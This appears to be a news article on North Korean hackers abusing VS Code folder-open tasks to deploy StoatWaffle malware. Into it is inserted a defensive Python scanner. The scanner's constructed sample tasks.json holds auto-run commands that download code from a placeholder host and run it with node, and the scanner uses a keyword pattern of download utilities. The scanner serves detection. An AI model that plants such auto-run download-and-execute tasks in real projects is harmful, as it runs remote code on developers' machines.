North Korean Hackers Abuse VS Code Auto-Run Tasks to Deploy StoatWaffle Malware


https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html

Publish Date: 2026-03-23 14:09:00

Source Domain: thehackernews.com

The North Korean threat actors behind the Contagious Interview campaign, also tracked as WaterPlum, have been attributed to a malware family tracked as StoatWaffle that’s distributed via malicious Microsoft Visual Studio Code (VS Code) projects.

The use of VS Code “tasks.json” to distribute malware is a relatively new tactic adopted by the threat actor since December 2025, with the attacks leveraging the “runOn: folderOpen” option to automatically trigger its execution every time any file in the project folder is opened in VS Code.

“This task is configured so that it downloads data from a web application on Vercel regardless of executing OS [operating system],” NTT Security said in a report published last week. “Though we assume that the executing OS is Windows in this article, the essential behaviors are the same for any OS.”
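The auto-run mechanism described above lives entirely in a repository's `.vscode/tasks.json`: a task whose `runOptions.runOn` is set to `folderOpen` is launched by VS Code when the folder is opened, and per-OS `windows`/`linux`/`osx` blocks let one task carry a different command for each platform. The following scanner is an added defender-side example, not code from the report or from NTT Security; it walks a directory tree, parses each `tasks.json` (tolerating the comments and trailing commas VS Code allows), and reports every folder-open task along with whether its command line contains a download utility. The sample `tasks.json`, the `example.invalid` URL and the keyword list are constructed for illustration.

```python
import json
import re
import sys
from pathlib import Path

# Constructed sample tasks.json (JSONC); the URL and commands are placeholders,
# not indicators from the report.
SAMPLE_TASKS_JSON = r'''
{
  // constructed sample, not from any real project
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/PLACEHOLDER | node -",
      "windows": {
        "command": "powershell -Command 'Invoke-WebRequest https://example.invalid/PLACEHOLDER -OutFile t.js; node t.js'"
      },
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
'''

# Download/eval utilities whose presence in an auto-run task deserves review.
# Constructed keyword list; extend to match your environment.
NETWORK_FETCH = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm|Invoke-Expression|iex)\b",
    re.IGNORECASE,
)


def load_jsonc(text: str) -> dict:
    """Best-effort JSONC loader: VS Code permits // and /* */ comments and trailing commas."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = "\n".join(l for l in text.splitlines() if not l.strip().startswith("//"))
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def task_commands(task: dict) -> list[str]:
    """Collect the default command plus any per-OS override, each joined with its args."""
    cmds = []
    for scope in (task, task.get("windows", {}), task.get("linux", {}), task.get("osx", {})):
        cmd = scope.get("command")
        if not cmd:
            continue
        # args entries are either plain strings or {"value": ..., "quoting": ...} objects
        args = [a if isinstance(a, str) else a.get("value", "") for a in scope.get("args", [])]
        cmds.append(" ".join([cmd, *args]))
    return cmds


def find_auto_run_tasks(text: str) -> list[dict]:
    """Return one finding per task that VS Code would launch automatically on folder open."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmds = task_commands(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "commands": cmds,
            "fetches_remote": any(NETWORK_FETCH.search(c) for c in cmds),
        })
    return findings


def scan_tree(root: Path) -> list[tuple[Path, list[dict]]]:
    """Scan every .vscode/tasks.json under root; unparsable files are reported as a finding."""
    results = []
    for path in root.rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            findings = find_auto_run_tasks(path.read_text(encoding="utf-8"))
        except (ValueError, OSError) as exc:
            findings = [{"label": "<parse error>", "commands": [str(exc)], "fetches_remote": False}]
        if findings:
            results.append((path, findings))
    return results


if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for path, findings in scan_tree(root):
        for f in findings:
            flag = "REMOTE-FETCH" if f["fetches_remote"] else "auto-run"
            print(f"{path}: [{flag}] {f['label']}: {' || '.join(f['commands'])}")
    # Demonstrate on the constructed sample
    for f in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print("sample:", f)
```

Run it against a checkout directory (or a home directory full of cloned repositories) before opening anything in VS Code; every folder-open task is worth reading, and those that pull code from the network are the ones matching the pattern in this campaign. Because the task body runs on whatever OS opens the folder, the scanner reports all per-OS variants rather than only the one for the scanning machine. Keeping VS Code's Workspace Trust enabled (`security.workspace.trust.enabled`) and leaving the `task.allowAutomaticTasks` setting at `off` for unfamiliar projects prevents these tasks from running until the folder is explicitly trusted.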

The downloaded payload first checks whether Node.js is installed in the executing environment. If it’s absent, the malware downloads Node.js from the official website and installs it. Subsequently, it proceeds to launch a downloader, which periodically polls an external server to fetch a next-stage downloader that exhibits identical behavior by reaching out to another endpoint on the same server and executing the received response as Node.js code.

StoatWaffle has been found to deliver two different modules –

  • A stealer that captures credentials and extension data stored in web browsers (Chromium-based browsers and Mozilla Firefox) and uploads them to a command-and-control (C2) server. If the compromised system runs on macOS, it also steals the iCloud Keychain database.
  • A remote access trojan (RAT) that communicates with the C2 server to fetch and execute commands on the infected host. The commands allow the malware to change the current working directory, enumerate files and directories, execute Node.js code, upload file, recursively search the given directory and list or upload files matching a certain keyword, run shell commands, and…
